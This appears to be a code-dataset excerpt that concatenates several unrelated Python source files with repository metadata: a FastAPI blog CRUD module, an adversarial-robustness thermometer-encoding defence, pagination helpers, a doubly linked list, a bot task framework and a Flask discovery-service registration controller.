blog = db.query(models.Blog).filter(models.Blog.id == id).first()
if blog:
return blog
else:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"Blog with the id {id} is not available",
)
| 21.263158 | 88 | 0.604373 |
from fastapi import HTTPException, status
from sqlalchemy.orm import Session
from models import models
from schema import schemas
def get_all(db: Session):
return db.query(models.Blog).all()
def create(request: schemas.Blog, db: Session):
new_blog = models.Blog(title=request.title, body=request.body, user_id=1)
db.add(new_blog)
db.commit()
db.refresh(new_blog)
return new_blog
def destroy(id: int, db: Session):
blog_to_delete = db.query(models.Blog).filter(models.Blog.id == id)
if not blog_to_delete.first():
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"Blog with id {id} not found.",
)
blog_to_delete.delete(synchronize_session=False)
db.commit()
return {"done"}
def update(id: int, request: schemas.Blog, db: Session):
blog = db.query(models.Blog).filter(models.Blog.id == id)
if not blog.first():
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND, detail=f"Blog with id {id} not found"
)
blog.update(request.__dict__)
db.commit()
return "updated"
def show(id: int, db: Session):
blog = db.query(models.Blog).filter(models.Blog.id == id).first()
if blog:
return blog
else:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"Blog with the id {id} is not available",
)
| true | true |
1c331dc6c1d546c5e719dd970de5dc96e49ca31d | 4,429 | py | Python | art/defences/thermometer_encoding.py | lr2582858/adversarial-robustness-toolbox | ee3b7ac1ef21fcfd21501070aff2f8eb9db70301 | [
"MIT"
] | 1 | 2018-11-23T06:44:43.000Z | 2018-11-23T06:44:43.000Z | art/defences/thermometer_encoding.py | lr2582858/adversarial-robustness-toolbox | ee3b7ac1ef21fcfd21501070aff2f8eb9db70301 | [
"MIT"
] | null | null | null | art/defences/thermometer_encoding.py | lr2582858/adversarial-robustness-toolbox | ee3b7ac1ef21fcfd21501070aff2f8eb9db70301 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (C) IBM Corporation 2018
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import numpy as np
from art.defences.preprocessor import Preprocessor
from art.utils import to_categorical
from art import NUMPY_DTYPE
logger = logging.getLogger(__name__)
class ThermometerEncoding(Preprocessor):
"""
Implement the thermometer encoding defence approach. Defence method from https://openreview.net/forum?id=S18Su--CW.
"""
params = ['num_space']
def __init__(self, num_space=10):
"""
Create an instance of thermometer encoding.
:param num_space: Number of evenly spaced levels within [0, 1].
:type num_space: `int`
"""
super(ThermometerEncoding, self).__init__()
self._is_fitted = True
self.set_params(num_space=num_space)
def __call__(self, x, y=None, num_space=None, clip_values=(0, 1)):
"""
Apply thermometer encoding to sample `x`.
:param x: Sample to encode with shape `(batch_size, width, height, depth)`.
:type x: `np.ndarray`
:param y: Labels of the sample `x`. This function does not affect them in any way.
:type y: `np.ndarray`
:param num_space: Number of evenly spaced levels within [0, 1].
:type num_space: `int`
:return: Encoded sample with shape `(batch_size, width, height, depth x num_space)`.
:rtype: `np.ndarray`
"""
if num_space is not None:
self.set_params(num_space=num_space)
result = []
for c in range(x.shape[-1]):
result.append(self._perchannel(x[:, :, :, c]))
result = np.concatenate(result, axis=3)
result = np.clip(result, clip_values[0], clip_values[1])
return result.astype(NUMPY_DTYPE)
def _perchannel(self, x):
"""
Apply thermometer encoding to one channel.
:param x: Sample to encode with shape `(batch_size, width, height)`.
:type x: `np.ndarray`
:return: Encoded sample with shape `(batch_size, width, height, num_space)`.
:rtype: `np.ndarray`
"""
pos = np.zeros(shape=x.shape)
for i in range(1, self.num_space):
pos[x > float(i) / self.num_space] += 1
onehot_rep = to_categorical(pos.reshape(-1), self.num_space)
for i in reversed(range(1, self.num_space)):
onehot_rep[:, i] += np.sum(onehot_rep[:, :i], axis=1)
result = onehot_rep.reshape(list(x.shape) + [self.num_space])
return result
def fit(self, x, y=None, **kwargs):
"""
No parameters to learn for this method; do nothing.
"""
pass
def set_params(self, **kwargs):
"""
Take in a dictionary of parameters and applies defence-specific checks before saving them as attributes.
:param num_space: Number of evenly spaced levels within [0, 1].
:type num_space: `int`
"""
# Save attack-specific parameters
super(ThermometerEncoding, self).set_params(**kwargs)
if type(self.num_space) is not int or self.num_space <= 0:
logger.error('Number of evenly spaced levels must be a positive integer.')
raise ValueError('Number of evenly spaced levels must be a positive integer.')
return True
| 36.908333 | 120 | 0.665613 |
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import numpy as np
from art.defences.preprocessor import Preprocessor
from art.utils import to_categorical
from art import NUMPY_DTYPE
logger = logging.getLogger(__name__)
class ThermometerEncoding(Preprocessor):
params = ['num_space']
def __init__(self, num_space=10):
super(ThermometerEncoding, self).__init__()
self._is_fitted = True
self.set_params(num_space=num_space)
def __call__(self, x, y=None, num_space=None, clip_values=(0, 1)):
if num_space is not None:
self.set_params(num_space=num_space)
result = []
for c in range(x.shape[-1]):
result.append(self._perchannel(x[:, :, :, c]))
result = np.concatenate(result, axis=3)
result = np.clip(result, clip_values[0], clip_values[1])
return result.astype(NUMPY_DTYPE)
def _perchannel(self, x):
pos = np.zeros(shape=x.shape)
for i in range(1, self.num_space):
pos[x > float(i) / self.num_space] += 1
onehot_rep = to_categorical(pos.reshape(-1), self.num_space)
for i in reversed(range(1, self.num_space)):
onehot_rep[:, i] += np.sum(onehot_rep[:, :i], axis=1)
result = onehot_rep.reshape(list(x.shape) + [self.num_space])
return result
def fit(self, x, y=None, **kwargs):
pass
def set_params(self, **kwargs):
super(ThermometerEncoding, self).set_params(**kwargs)
if type(self.num_space) is not int or self.num_space <= 0:
logger.error('Number of evenly spaced levels must be a positive integer.')
raise ValueError('Number of evenly spaced levels must be a positive integer.')
return True
| true | true |
1c331ddb1997d4e4af5fb713910dc8fbb5641f67 | 1,129 | py | Python | girder/molecules/molecules/utilities/pagination.py | bnmajor/mongochemserver | aa76ab6e7f749c3e893f27e208984b6ed2d4b2b5 | [
"BSD-3-Clause"
] | 14 | 2015-05-04T16:40:48.000Z | 2021-07-13T08:00:30.000Z | girder/molecules/molecules/utilities/pagination.py | bnmajor/mongochemserver | aa76ab6e7f749c3e893f27e208984b6ed2d4b2b5 | [
"BSD-3-Clause"
] | 88 | 2015-07-24T07:58:43.000Z | 2021-02-23T19:37:13.000Z | girder/molecules/molecules/utilities/pagination.py | bnmajor/mongochemserver | aa76ab6e7f749c3e893f27e208984b6ed2d4b2b5 | [
"BSD-3-Clause"
] | 8 | 2015-06-12T20:54:39.000Z | 2021-04-09T01:07:15.000Z | from girder.constants import SortDir
def default_pagination_params(limit=None, offset=None, sort=None):
"""Returns default params unless they are set"""
if limit is None:
limit = 25
if offset is None:
offset = 0
if sort is None:
sort = [('_id', SortDir.DESCENDING)]
return limit, offset, sort
def parse_pagination_params(params):
"""Parse params and get (limit, offset, sort)
The defaults will be returned if not found in params.
"""
# Defaults
limit, offset, sort = default_pagination_params()
if params:
if 'limit' in params:
limit = int(params['limit'])
if 'offset' in params:
offset = int(params['offset'])
if 'sort' in params and 'sortdir' in params:
sort = [(params['sort'], int(params['sortdir']))]
return limit, offset, sort
def search_results_dict(results, num_matches, limit, offset, sort):
"""This is for consistent search results"""
ret = {
'matches': num_matches,
'limit': limit,
'offset': offset,
'results': results
}
return ret
| 28.225 | 67 | 0.612046 | from girder.constants import SortDir
def default_pagination_params(limit=None, offset=None, sort=None):
if limit is None:
limit = 25
if offset is None:
offset = 0
if sort is None:
sort = [('_id', SortDir.DESCENDING)]
return limit, offset, sort
def parse_pagination_params(params):
limit, offset, sort = default_pagination_params()
if params:
if 'limit' in params:
limit = int(params['limit'])
if 'offset' in params:
offset = int(params['offset'])
if 'sort' in params and 'sortdir' in params:
sort = [(params['sort'], int(params['sortdir']))]
return limit, offset, sort
def search_results_dict(results, num_matches, limit, offset, sort):
ret = {
'matches': num_matches,
'limit': limit,
'offset': offset,
'results': results
}
return ret
| true | true |
1c331ddd38ebe454abfa15a1da7a1654eb669ea7 | 753 | py | Python | Chapter 6/glossary.py | WilliamJaber/Python-Crash-Course | d87621785011039fbe0b42f0d8b6cd2364246577 | [
"MIT"
] | null | null | null | Chapter 6/glossary.py | WilliamJaber/Python-Crash-Course | d87621785011039fbe0b42f0d8b6cd2364246577 | [
"MIT"
] | null | null | null | Chapter 6/glossary.py | WilliamJaber/Python-Crash-Course | d87621785011039fbe0b42f0d8b6cd2364246577 | [
"MIT"
] | 5 | 2021-09-22T16:53:47.000Z | 2022-03-24T00:56:49.000Z | glossary = {
'integer': 'is colloquially defined as a number that can be written without a fractional component.\n',
'iterate': 'is the repetition of a process in order to generate a sequence of outcomes.\n',
'indentation': 'is an empty space at the beginning of a line that groups particular blocks of code.\n',
'concatinate': 'is the operation of joining character strings end-to-end.\n',
'boolean': 'is a logical data type that can have only the values True or False.\n',
}
print(f"Integer: {glossary.get('integer')}\n")
print(f"Iterate: {glossary.get('iterate')}\n")
print(f"Indentation: {glossary.get('indentation')}\n")
print(f"Concatinate: {glossary.get('concatinate')}\n")
print(f"Boolean: {glossary.get('boolean')}\n")
| 53.785714 | 107 | 0.707835 | glossary = {
'integer': 'is colloquially defined as a number that can be written without a fractional component.\n',
'iterate': 'is the repetition of a process in order to generate a sequence of outcomes.\n',
'indentation': 'is an empty space at the beginning of a line that groups particular blocks of code.\n',
'concatinate': 'is the operation of joining character strings end-to-end.\n',
'boolean': 'is a logical data type that can have only the values True or False.\n',
}
print(f"Integer: {glossary.get('integer')}\n")
print(f"Iterate: {glossary.get('iterate')}\n")
print(f"Indentation: {glossary.get('indentation')}\n")
print(f"Concatinate: {glossary.get('concatinate')}\n")
print(f"Boolean: {glossary.get('boolean')}\n")
| true | true |
1c331edf3f31abdaae2975dbc1c63f484ebad872 | 1,409 | py | Python | generate_tsv.py | mr-martian/PTNK | beb162053af8f73dd276d72205eab4ff28591c64 | [
"MIT"
] | null | null | null | generate_tsv.py | mr-martian/PTNK | beb162053af8f73dd276d72205eab4ff28591c64 | [
"MIT"
] | null | null | null | generate_tsv.py | mr-martian/PTNK | beb162053af8f73dd276d72205eab4ff28591c64 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import yaml
def extract_lang(blob, lang):
if lang not in blob:
return []
ret = []
dct = {}
n = 0
for k in blob[lang]:
n1, n2 = blob[lang][k].split('-')
n = max(n, int(n2))
for i in range(int(n1), int(n2)+1):
dct[i] = k
for i in range(1, n+1):
ret.append(dct.get(i, ''))
return ret
def process_block(blob, langs):
ret = []
idents = [extract_lang(blob, l) for l in langs]
# TODO: check that they're the same length
for tup in zip(*idents):
ls = list(tup)
real = [s for s in ls if s]
if len(real) < 2 and len(real) != len(langs):
continue
ln = '\t'.join(ls)
if ln not in ret:
ret.append(ln)
return '\n'.join(ret)
def process_file(fname, langs):
with open(fname) as fin:
blob = yaml.safe_load(fin)
blocks = [process_block(b, langs) for b in blob]
return '\n'.join(blocks) + '\n'
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser('Convert YAML source files to TSV.')
parser.add_argument('infile', action='store')
parser.add_argument('outfile', action='store')
parser.add_argument('langs', nargs='+')
args = parser.parse_args()
print(args)
with open(args.outfile, 'w') as fout:
fout.write(process_file(args.infile, args.langs))
| 27.627451 | 73 | 0.568488 |
import yaml
def extract_lang(blob, lang):
if lang not in blob:
return []
ret = []
dct = {}
n = 0
for k in blob[lang]:
n1, n2 = blob[lang][k].split('-')
n = max(n, int(n2))
for i in range(int(n1), int(n2)+1):
dct[i] = k
for i in range(1, n+1):
ret.append(dct.get(i, ''))
return ret
def process_block(blob, langs):
ret = []
idents = [extract_lang(blob, l) for l in langs]
for tup in zip(*idents):
ls = list(tup)
real = [s for s in ls if s]
if len(real) < 2 and len(real) != len(langs):
continue
ln = '\t'.join(ls)
if ln not in ret:
ret.append(ln)
return '\n'.join(ret)
def process_file(fname, langs):
with open(fname) as fin:
blob = yaml.safe_load(fin)
blocks = [process_block(b, langs) for b in blob]
return '\n'.join(blocks) + '\n'
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser('Convert YAML source files to TSV.')
parser.add_argument('infile', action='store')
parser.add_argument('outfile', action='store')
parser.add_argument('langs', nargs='+')
args = parser.parse_args()
print(args)
with open(args.outfile, 'w') as fout:
fout.write(process_file(args.infile, args.langs))
| true | true |
1c331efec726708105560f1ead5a3cb0947f2d57 | 2,841 | py | Python | xenon_worker/commands/module.py | NicCardozo/xenon-worker | 90915e9738234db28a7a2dea63dd1f5fa7a5ecea | [
"MIT"
] | 17 | 2020-05-07T14:51:14.000Z | 2022-03-21T16:37:10.000Z | xenon_worker/commands/module.py | NicCardozo/xenon-worker | 90915e9738234db28a7a2dea63dd1f5fa7a5ecea | [
"MIT"
] | 5 | 2020-10-16T13:54:54.000Z | 2020-12-21T15:13:31.000Z | xenon_worker/commands/module.py | NicCardozo/xenon-worker | 90915e9738234db28a7a2dea63dd1f5fa7a5ecea | [
"MIT"
] | 7 | 2020-05-15T14:19:20.000Z | 2021-10-14T03:43:34.000Z | from .command import Command
from datetime import timedelta, datetime
import traceback
import asyncio
class Task:
def __init__(self, callback, delta=True, **units):
self.delta = delta
self.callback = callback
self.units = units
self.module = None # Gets filled by bot.add_module
@property
def time_to_wait(self):
if self.delta:
return timedelta(**self.units).total_seconds()
now = datetime.utcnow()
time = datetime.utcnow().replace(
hour=self.units.get("hour", 0),
minute=self.units.get("minute", 0),
second=self.units.get("seconds", 0),
microsecond=0
)
wait = time - now
if wait.total_seconds() < 0:
wait += timedelta(days=1)
return wait.total_seconds()
def construct(self):
async def coro():
while True:
await asyncio.sleep(self.time_to_wait)
try:
await self.callback(self.module)
except:
traceback.print_exc()
return coro()
class Listener:
def __init__(self, callback, name=None):
name = name or callback.__name__
if name.startswith("on_"):
name = name[3:]
self.module = None # Gets filled by bot.add_module
self.name = name
self.callback = callback
async def execute(self, *args, **kwargs):
if self.module is None:
await self.callback(*args, **kwargs)
else:
await self.callback(self.module, *args, **kwargs)
class Module:
def __init__(self, client):
self.client = client
self.bot = client
@property
def commands(self):
for name in dir(self):
attr = getattr(self, name)
# attr.parent is None checks if it is a subcommand
if isinstance(attr, Command) and attr.parent is None:
yield attr
@property
def listeners(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Listener):
yield attr
@property
def tasks(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Task):
yield attr
@staticmethod
def command(*args, **kwargs):
def _predicate(callback):
return Command(callback, *args, **kwargs)
return _predicate
@staticmethod
def listener(*args, **kwargs):
def _predicate(callback):
return Listener(callback, *args, **kwargs)
return _predicate
@staticmethod
def task(*args, **kwargs):
def _predicate(callback):
return Task(callback, *args, **kwargs)
return _predicate
| 25.366071 | 65 | 0.560366 | from .command import Command
from datetime import timedelta, datetime
import traceback
import asyncio
class Task:
def __init__(self, callback, delta=True, **units):
self.delta = delta
self.callback = callback
self.units = units
self.module = None
@property
def time_to_wait(self):
if self.delta:
return timedelta(**self.units).total_seconds()
now = datetime.utcnow()
time = datetime.utcnow().replace(
hour=self.units.get("hour", 0),
minute=self.units.get("minute", 0),
second=self.units.get("seconds", 0),
microsecond=0
)
wait = time - now
if wait.total_seconds() < 0:
wait += timedelta(days=1)
return wait.total_seconds()
def construct(self):
async def coro():
while True:
await asyncio.sleep(self.time_to_wait)
try:
await self.callback(self.module)
except:
traceback.print_exc()
return coro()
class Listener:
def __init__(self, callback, name=None):
name = name or callback.__name__
if name.startswith("on_"):
name = name[3:]
self.module = None
self.name = name
self.callback = callback
async def execute(self, *args, **kwargs):
if self.module is None:
await self.callback(*args, **kwargs)
else:
await self.callback(self.module, *args, **kwargs)
class Module:
def __init__(self, client):
self.client = client
self.bot = client
@property
def commands(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Command) and attr.parent is None:
yield attr
@property
def listeners(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Listener):
yield attr
@property
def tasks(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Task):
yield attr
@staticmethod
def command(*args, **kwargs):
def _predicate(callback):
return Command(callback, *args, **kwargs)
return _predicate
@staticmethod
def listener(*args, **kwargs):
def _predicate(callback):
return Listener(callback, *args, **kwargs)
return _predicate
@staticmethod
def task(*args, **kwargs):
def _predicate(callback):
return Task(callback, *args, **kwargs)
return _predicate
| true | true |
1c331f3d5b497a66325b056d47f208d9d3525d44 | 4,804 | py | Python | DataStructures/DoubleLinkedList.py | jamwine/Data-Structures-and-Algorithm | 9e1377701d7ea60557130e08fca59b1f9ee2ddab | [
"MIT"
] | null | null | null | DataStructures/DoubleLinkedList.py | jamwine/Data-Structures-and-Algorithm | 9e1377701d7ea60557130e08fca59b1f9ee2ddab | [
"MIT"
] | null | null | null | DataStructures/DoubleLinkedList.py | jamwine/Data-Structures-and-Algorithm | 9e1377701d7ea60557130e08fca59b1f9ee2ddab | [
"MIT"
] | 1 | 2020-06-19T19:54:26.000Z | 2020-06-19T19:54:26.000Z | class DoublyLinkedListNode:
def __init__(self,value):
self.info=value
self.prev=None
self.next=None
class DoubleLinkedList:
def __init__(self):
self.start=None
def display_list(self):
if self.start is None:
print("List is empty.")
return
else:
print("List is:")
p=self.start
while p is not None:
print(p.info," ",end="")
p=p.next
print()
def count_nodes(self):
p=self.start
n=0
while p is not None:
n+=1
p=p.next
print("Number of nodes in the list:",n)
return n
def search(self,x):
position=1
p=self.start
while p is not None:
if p.info==x:
print(x,"is at position:",position)
return True
position+=1
p=p.next
else:
print(x,"not found in the list.")
return False
def insert_in_beginning(self,data):
temp=DoublyLinkedListNode(data)
temp.next=self.start
self.start.prev=temp
self.start=temp
def insert_in_empty_list(self,data):
temp=DoublyLinkedListNode(data)
self.start=temp
def insert_at_end(self,data):
temp=DoublyLinkedListNode(data)
p=self.start
while p.next is not None:
p=p.next
p.next=temp
temp.prev=p
def create_list(self):
n=int(input("Enter the number of nodes:"))
if n==0:
return
data=int(input("Enter the first element to be inserted:"))
self.insert_in_empty_list(data)
for i in range(n-1):
data=int(input("Enter the next element to be inserted:"))
self.insert_at_end(data)
def insert_after(self,data,x):
temp=DoublyLinkedListNode(data)
p=self.start
while p is not None:
if p.info==x:
break
p=p.next
if p is None:
print(x," not present in the list")
else:
temp.prev=p
temp.next=p.next
if p.next is not None:
p.next.prev=temp
p.next=temp
def insert_before(self,data,x):
if self.start is None:
print("List is empty")
return
if x==self.start.info:
temp=DoublyLinkedListNode(data)
temp.next=self.start
self.start.prev=temp
self.start=temp
return
p=self.start
while p is not None:
if p.info==x:
break
p=p.next
if p is None:
print(x,"is not present in the list")
else:
temp=DoublyLinkedListNode(data)
temp.prev=p.prev
temp.next=p
p.prev.next=temp
p.prev=temp
def delete_node(self,x):
if self.start is None:
print("List is empty")
if self.start.next is None:
if self.start.info==x:
self.start=None
else:
print(x,'not found')
return
if self.start.info==x:
self.start=self.start.next
self.start.prev=None
return
p=self.start.next
while p.next is not None:
if p.info==x:
break
p=p.next
if p.next is not None:
p.prev.next=p.next
p.next.prev=p.prev
else:
if p.info==x:
p.prev.next=None
else:
print("Element",x,"is not in the list")
def delete_first_node(self):
if self.start is None:
return
if self.start.next is None:
self.start=None
return
self.start=self.start.next
self.start.prev=None
def delete_last_node(self):
if self.start is None:
return
if self.start.next is None:
self.start=None
return
p=self.start
while p.next is not None:
p=p.next
p.prev.next=None
def reverse_list(self):
if self.start is None:
return
p1=self.start
p2=p1.next
p1.next=None
p1.prev=p2
while p2 is not None:
p2.prev=p2.next
p2.next=p1
p1=p2
p2=p2.prev
self.start=p1
print("List is reversed")
| 25.827957 | 80 | 0.466694 | class DoublyLinkedListNode:
def __init__(self,value):
self.info=value
self.prev=None
self.next=None
class DoubleLinkedList:
def __init__(self):
self.start=None
def display_list(self):
if self.start is None:
print("List is empty.")
return
else:
print("List is:")
p=self.start
while p is not None:
print(p.info," ",end="")
p=p.next
print()
def count_nodes(self):
p=self.start
n=0
while p is not None:
n+=1
p=p.next
print("Number of nodes in the list:",n)
return n
def search(self,x):
position=1
p=self.start
while p is not None:
if p.info==x:
print(x,"is at position:",position)
return True
position+=1
p=p.next
else:
print(x,"not found in the list.")
return False
def insert_in_beginning(self,data):
temp=DoublyLinkedListNode(data)
temp.next=self.start
self.start.prev=temp
self.start=temp
def insert_in_empty_list(self,data):
temp=DoublyLinkedListNode(data)
self.start=temp
def insert_at_end(self,data):
temp=DoublyLinkedListNode(data)
p=self.start
while p.next is not None:
p=p.next
p.next=temp
temp.prev=p
def create_list(self):
n=int(input("Enter the number of nodes:"))
if n==0:
return
data=int(input("Enter the first element to be inserted:"))
self.insert_in_empty_list(data)
for i in range(n-1):
data=int(input("Enter the next element to be inserted:"))
self.insert_at_end(data)
def insert_after(self,data,x):
temp=DoublyLinkedListNode(data)
p=self.start
while p is not None:
if p.info==x:
break
p=p.next
if p is None:
print(x," not present in the list")
else:
temp.prev=p
temp.next=p.next
if p.next is not None:
p.next.prev=temp
p.next=temp
def insert_before(self,data,x):
if self.start is None:
print("List is empty")
return
if x==self.start.info:
temp=DoublyLinkedListNode(data)
temp.next=self.start
self.start.prev=temp
self.start=temp
return
p=self.start
while p is not None:
if p.info==x:
break
p=p.next
if p is None:
print(x,"is not present in the list")
else:
temp=DoublyLinkedListNode(data)
temp.prev=p.prev
temp.next=p
p.prev.next=temp
p.prev=temp
def delete_node(self,x):
if self.start is None:
print("List is empty")
if self.start.next is None:
if self.start.info==x:
self.start=None
else:
print(x,'not found')
return
if self.start.info==x:
self.start=self.start.next
self.start.prev=None
return
p=self.start.next
while p.next is not None:
if p.info==x:
break
p=p.next
if p.next is not None:
p.prev.next=p.next
p.next.prev=p.prev
else:
if p.info==x:
p.prev.next=None
else:
print("Element",x,"is not in the list")
def delete_first_node(self):
if self.start is None:
return
if self.start.next is None:
self.start=None
return
self.start=self.start.next
self.start.prev=None
def delete_last_node(self):
if self.start is None:
return
if self.start.next is None:
self.start=None
return
p=self.start
while p.next is not None:
p=p.next
p.prev.next=None
def reverse_list(self):
if self.start is None:
return
p1=self.start
p2=p1.next
p1.next=None
p1.prev=p2
while p2 is not None:
p2.prev=p2.next
p2.next=p1
p1=p2
p2=p2.prev
self.start=p1
print("List is reversed")
| true | true |
1c3320d62c581e4c4d90edc647893f6ef53ad9c8 | 1,416 | py | Python | src/Loss.py | roshan19041/Causal-Discovery | 900cfc94d9fc3ff3d75366b00bda3acd044ed638 | [
"MIT"
] | 1 | 2020-07-20T00:00:31.000Z | 2020-07-20T00:00:31.000Z | src/Loss.py | roshan19041/Causal-Discovery | 900cfc94d9fc3ff3d75366b00bda3acd044ed638 | [
"MIT"
] | null | null | null | src/Loss.py | roshan19041/Causal-Discovery | 900cfc94d9fc3ff3d75366b00bda3acd044ed638 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 23 18:59:20 2019
@author: roshanprakash
"""
import tensorflow as tf
def compute_loss(generated_data, observed_data):
"""
Computes the Maximum Mean Discrepancy between generated data and observational data.
PARAMETERS
----------
- generated_data (numpy array) : the generated data of shape (N, D)
- observed_data (numpy array) : the corresponding ground truth data of shape (N, D)
RETURNS
-------
- the MMD loss.
REFERENCE
---------
[1.] Training generative neural networks via Maximum Mean Discrepancy optimization
[2.] Link : https://arxiv.org/pdf/1505.03906.pdf
"""
N = tf.cast(tf.shape(observed_data)[0], dtype=tf.float32)
GAMMA = tf.constant(0.01, dtype=tf.float32, name='gamma')
MULTIPLIERS = tf.concat([tf.ones([N, 1])/N, tf.ones([N, 1])/-N], axis=0)
X = tf.concat(values=[generated_data, observed_data], axis=0)
DOTS = tf.matmul(X, tf.transpose(X))
SQUARE_SUMS = tf.transpose(tf.reduce_sum(tf.square(X), axis=1, keepdims=True))
EXPONENT_TERMS = tf.add_n([tf.scalar_mul(-2, DOTS), tf.broadcast_to(SQUARE_SUMS, tf.shape(DOTS)), \
tf.broadcast_to(tf.transpose(SQUARE_SUMS), tf.shape(DOTS))])
MMDLoss = tf.reduce_sum(tf.multiply(MULTIPLIERS, tf.exp(tf.scalar_mul(-GAMMA, EXPONENT_TERMS))))
return MMDLoss | 38.27027 | 103 | 0.653249 |
import tensorflow as tf
def compute_loss(generated_data, observed_data):
N = tf.cast(tf.shape(observed_data)[0], dtype=tf.float32)
GAMMA = tf.constant(0.01, dtype=tf.float32, name='gamma')
MULTIPLIERS = tf.concat([tf.ones([N, 1])/N, tf.ones([N, 1])/-N], axis=0)
X = tf.concat(values=[generated_data, observed_data], axis=0)
DOTS = tf.matmul(X, tf.transpose(X))
SQUARE_SUMS = tf.transpose(tf.reduce_sum(tf.square(X), axis=1, keepdims=True))
EXPONENT_TERMS = tf.add_n([tf.scalar_mul(-2, DOTS), tf.broadcast_to(SQUARE_SUMS, tf.shape(DOTS)), \
tf.broadcast_to(tf.transpose(SQUARE_SUMS), tf.shape(DOTS))])
MMDLoss = tf.reduce_sum(tf.multiply(MULTIPLIERS, tf.exp(tf.scalar_mul(-GAMMA, EXPONENT_TERMS))))
return MMDLoss | true | true |
1c33219ed2e9b4b02b73a62e759b3bb6b3f1a3e0 | 5,242 | py | Python | api/admin/controller/discovery_service_library_registrations.py | aseefahmed/circulation | 17cbc9186ab3cde9606912559f92b393ac18ecaa | [
"Apache-2.0"
] | null | null | null | api/admin/controller/discovery_service_library_registrations.py | aseefahmed/circulation | 17cbc9186ab3cde9606912559f92b393ac18ecaa | [
"Apache-2.0"
] | 44 | 2022-01-20T01:31:32.000Z | 2022-03-31T01:50:41.000Z | api/admin/controller/discovery_service_library_registrations.py | jonathangreen/circulation | 118866f8257e2a97431a28ea5ba8e34e5bd393eb | [
"Apache-2.0"
] | null | null | null | import json
import flask
from flask import Response
from flask_babel import lazy_gettext as _
from api.admin.problem_details import *
from api.registration.registry import Registration, RemoteRegistry
from core.model import ExternalIntegration, Library, get_one
from core.util.http import HTTP
from core.util.problem_detail import ProblemDetail
from . import SettingsController
class DiscoveryServiceLibraryRegistrationsController(SettingsController):
"""List the libraries that have been registered with a specific
RemoteRegistry, and allow the admin to register a library with
a RemoteRegistry.
:param registration_class: Mock class to use instead of Registration.
"""
def __init__(self, manager):
super(DiscoveryServiceLibraryRegistrationsController, self).__init__(manager)
self.goal = ExternalIntegration.DISCOVERY_GOAL
def process_discovery_service_library_registrations(
self,
registration_class=None,
do_get=HTTP.debuggable_get,
do_post=HTTP.debuggable_post,
):
registration_class = registration_class or Registration
self.require_system_admin()
if flask.request.method == "GET":
return self.process_get(do_get)
else:
return self.process_post(registration_class, do_get, do_post)
def process_get(self, do_get=HTTP.debuggable_get):
"""Make a list of all discovery services, each with the
list of libraries registered with that service and the
status of the registration."""
services = []
for registry in RemoteRegistry.for_protocol_and_goal(
self._db, ExternalIntegration.OPDS_REGISTRATION, self.goal
):
result = registry.fetch_registration_document(do_get=do_get)
if isinstance(result, ProblemDetail):
# Unlike most cases like this, a ProblemDetail doesn't
# mean the whole request is ruined -- just that one of
# the discovery services isn't working. Turn the
# ProblemDetail into a JSON object and return it for
# handling on the client side.
access_problem = json.loads(result.response[0])
terms_of_service_link = terms_of_service_html = None
else:
access_problem = None
terms_of_service_link, terms_of_service_html = result
libraries = []
for registration in registry.registrations:
library_info = self.get_library_info(registration)
if library_info:
libraries.append(library_info)
services.append(
dict(
id=registry.integration.id,
access_problem=access_problem,
terms_of_service_link=terms_of_service_link,
terms_of_service_html=terms_of_service_html,
libraries=libraries,
)
)
return dict(library_registrations=services)
def get_library_info(self, registration):
"""Find the relevant information about the library which the user
is trying to register"""
library = registration.library
library_info = dict(short_name=library.short_name)
status = registration.status_field.value
stage_field = registration.stage_field.value
if stage_field:
library_info["stage"] = stage_field
if status:
library_info["status"] = status
return library_info
def look_up_registry(self, integration_id):
"""Find the RemoteRegistry that the user is trying to register the library with,
and check that it actually exists."""
registry = RemoteRegistry.for_integration_id(
self._db, integration_id, self.goal
)
if not registry:
return MISSING_SERVICE
return registry
def look_up_library(self, library_short_name):
"""Find the library the user is trying to register, and check that it actually exists."""
library = get_one(self._db, Library, short_name=library_short_name)
if not library:
return NO_SUCH_LIBRARY
return library
def process_post(self, registration_class, do_get, do_post):
"""Attempt to register a library with a RemoteRegistry."""
integration_id = flask.request.form.get("integration_id")
library_short_name = flask.request.form.get("library_short_name")
stage = (
flask.request.form.get("registration_stage") or Registration.TESTING_STAGE
)
registry = self.look_up_registry(integration_id)
if isinstance(registry, ProblemDetail):
return registry
library = self.look_up_library(library_short_name)
if isinstance(library, ProblemDetail):
return library
registration = registration_class(registry, library)
registered = registration.push(
stage, self.url_for, do_get=do_get, do_post=do_post
)
if isinstance(registered, ProblemDetail):
return registered
return Response(str(_("Success")), 200)
| 37.71223 | 97 | 0.660816 | import json
import flask
from flask import Response
